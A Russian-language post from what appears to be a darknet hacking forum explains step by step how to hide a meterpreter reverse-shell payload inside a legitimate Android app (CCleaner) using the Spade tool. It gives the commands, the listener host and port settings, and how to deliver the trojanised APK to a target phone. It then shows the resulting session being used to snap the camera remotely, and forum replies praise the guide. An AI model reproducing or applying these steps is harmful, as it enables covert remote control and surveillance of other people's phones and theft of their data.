Взлом Android-устройства

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

hack-anonim

Пользователь

hack-anonim

Пользователь
24 Окт 2015
572
316
Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.

Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner)

Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее: git clone
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


upload_2016-12-31_2-5-3.png

После успешного выполнения команды, вводим следующее:

> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)

После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.

> lhost > 192.168.0.103

> lport > 4444


upload_2016-12-31_2-5-3.png upload_2016-12-31_2-5-3.png

Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.


upload_2016-12-31_2-5-3.png

Видим привилегии, которые нам доступны:

upload_2016-12-31_2-5-3.png

Готовый файл сохраняется в директории /root/spade

upload_2016-12-31_2-5-3.png

На запрос этой настройки отвечаем утвердительно:

upload_2016-12-31_2-5-3.png

Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:


upload_2016-12-31_2-5-3.png

Попробуем осмотреться в системе:

upload_2016-12-31_2-5-3.png

Все работает, теперь можно испытать работу, к примеру, камеры: webcam_snap



upload_2016-12-31_2-5-3.png

И эта команда срабатывает успешно:

upload_2016-12-31_2-5-3.png
 

teranser

VIP

teranser

VIP
6 Янв 2017
476
257
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Большой и жирный лайк! Хороший мануал
 

Chivas

Участник

Chivas

Участник
11 Фев 2017
1
0
Все сделал как показано выше, только сессия открывается и сразу закрывается. Как можно исправить?
 

teranser

VIP

teranser

VIP
6 Янв 2017
476
257
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Кто нибудь делал?
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя